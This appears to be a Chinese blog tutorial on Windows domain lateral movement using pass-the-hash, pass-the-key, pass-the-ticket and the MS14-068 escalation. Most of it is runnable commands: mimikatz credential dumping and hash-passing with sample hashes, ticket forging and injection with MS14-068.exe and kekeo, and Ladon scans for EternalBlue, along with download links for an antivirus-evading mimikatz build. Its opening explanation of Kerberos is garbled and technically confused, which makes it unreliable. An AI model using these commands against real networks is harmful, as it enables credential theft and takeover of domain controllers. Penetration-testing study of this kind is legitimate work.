在域内简要介绍具体的工作方法：

• 客户机将使用明文密码 NTLM 然后用时间戳加密(使用)krbtgt 密码 hash 发送给为密钥) kdc（域控），kdc 检测用户，成功创建 TGT(Ticket-Granting Ticket)
• 将 TGT 只有域用户将加密签名返回只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据
• 然后客户机会 TGT 向域控制器发送 KDC 请求 TGS票证(票证授权服务)和对 TGT 进行检测。
• 检测成功后，目标服务账户将进行检测 NTLM 以及 TGT 加密，将 加密结果返回客户机。

PTH(pass the hash) 利用 lm 或 ntlm 渗透试验的值。

PTH 内网渗透是一种非常经典的攻击方式，其原理是攻击者可以直接通过 LM Hash 和 NTLM Hash 在不提供明文密码的情况下，访问远程主机或服务。

如果禁用了 ntlm 认证，PsExec 得不到的 ntlm hash 远程连接，但使用 mimikatz 还能攻击成功。

对于 8.1/2012r2，安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等，可用 AES keys 代替 NT hash 来实现 ptk 攻击。

pth：没有补丁的用户可以连接，只能打补丁 administrator 连接 ptk：用户可以用补丁连接 aes256 连接 https://www.freebuf.com/column/220740.html

PTK(pass the key) 利用的 ekeys aes256 渗透试验

PTT(pass the ticket) 使用票据凭证 TGT 渗透试验。

PTT 攻击部分不简单 NTLM 认证，是用的 Kerberos 本文介绍了三种常见的攻击方法：

• MS14-068
• Golden ticket
• SILVER ticket

简单地说，将合法的连接票据注入内存实现连接。 MS14-068 基于漏洞，Golden ticket(黄金票据)，SILVER ticket(白银票据)其中 Golden ticket(黄金票据)，SILVER ticket(白银票据)属于权限维护技术。 MS14-068 危害是允许域内任何普通用户将自己提升到域管权限。微软给出的补丁是kb3011780

PTH ntlm 传递 未补丁下的工作组和域连接

#域连接 sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 #工作组连接 sekurlsa::pth /user:administrator /domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c #在实战中，本地用户和域用户都试图连接 sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 \\OWA2010CN-God.god.org privilege::debug sekurlsa::logonpasswords 

获得域内主机权限后，可使用mimikatz运行sekurlsa::logonPasswords命令获取其LM和NTLM。

注意：Windows系统LM Hash及NTLM Hash加密算法，个人系统Windows vista服务器系统在后面Windows 2003年以后，认证方法均为NTLM Hash。目前大部分主机系统都是新的，所以我们通常收集它们NTLM但也不排除内网有老系统，所以在收集信息时，最好LM和NTLM收集一切。

LM       :e90127c07127ed12f4ebf668acca53e9 NTLM     :518b98ad4178a53695dc997aa02d455c 

当收集到NTLM在数据之后，很可能内网还有其他主机NTLM值与我们收集到的一致。此时我们就可以使用NTLM横向渗透内网。

运行以下命令，域横向移动PTH传输，攻击未打补丁的下域主机，包括ccef208c6485269c20db2cad21734fe7.前期收集信息时收集的信息NTLM值。

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 sekurlsa::pth/user:administrator /domain:workgroup/ntlm:518b98ad4178a53695dc997aa02d455c 

弹出一个新的cmd只要弹出框，就意味着主机和我们在这个域收集的NTLM相同的值。然后我们就可以了。at schtasks 其他操作，如复制文件、执行文件等。

dir \\OWA2010CN-God.god.org\c$ dir \\192.168.3.21\c$ 

PTK aes256传递 - 补丁后的工作组和域连接: 因为PTK传输需要前提，主机必须打补丁kb2871997。 在实际上，PTK传递比PTH传输少。

sekurlsa::ekeys 获取aes256值 sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b 

获取aes256值

PTK传输(这里使用本机aes256，只做操作演示)

MS14-068 powershell 实现普通用户直接获取域控 system 权限

• MS14-068下载：https://github.com/abtchy17/WindowsExploits/tree/master/MS14-068

1. whoami/user 查看当前 sid

 S-1-5-21-1218902331-2157346161-1782232778-1124

mary就是域内一个普通用户

2.清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造

 klist //查看当前机器凭证
 klist purge//清空当前机器中所有凭证

3.利用 ms14-068 生成 TGT 数据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
.\MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

4.票据注入内存

./mimikatz.exe 
kerberos::ptc TGT_mary@god.org.ccache
exit

5.查看凭证列表 klist

6.利用

dir \\192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

• 工具kekeo下载：https://github.com/gentilkiwi/kekeo/releases

1.生成票据

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

2.导入票据

kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi

3.查看凭证 klist

4.利用

dir \\192.168.3.21\c$

因为当前主机肯定之前与其他主机连接过，所以本地应该生成了一些票据，我们可以导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗。

缺点：票据是有有效期的，一般为10小时，所以如果当前主机10h之内连接过域控的话，我们可以利用该票据，但是如果超过10h，就没法利用。

导出本地票据(需管理权限)到当前目录

sekurlsa::tickets /export

导入票据

kerberos::ptt xxxxxxxxxx.xxxx.kirbi

利用票据

总结：ptt 传递不需本地管理员权限，连接时主机名连接，基于漏洞,工具,本地票据

信息收集-协议扫描-漏洞探针-传递攻击等

github：Release Ladon 911

官网：http://k8gege.org/Ladon/

具体用法请查看官网wiki，举例如下

Ladon.exe 192.168.1.8/24 OnlinePC 扫当前机器所处C段的存活主机，其它模块同理
Ladon.exe 192.168.1.8/24 OsScan 扫当前机器所处C段操作系统版本，其它模块同理
Ladon.exe 192.168.1.8/24 MysqlScan 扫当前机器所处C段的ssh端口，其它模块同理
Ladon 192.168.1.8/24 MS17010 扫当前机器所处C段的永恒之蓝漏洞，其它模块同理
参考：https://www.cnblogs.com/zpchcbd/p/11944486.html

https://github.com/gentilkiwi/kekeo/

k8gege/Ladon: 大型内网渗透扫描器

解压密码：k8gege.org

MS14-068

https://github.com/ianxtianxt/MS14-068/blob/master/MS14-068.exe

暗月免杀mimikatz

链接：https://pan.baidu.com/s/1erHWNWQ6roVWTKNkdWsffg?pwd=uy5q 提取码：uy5q

https://www.cnblogs.com/zhengna/p/15320256.html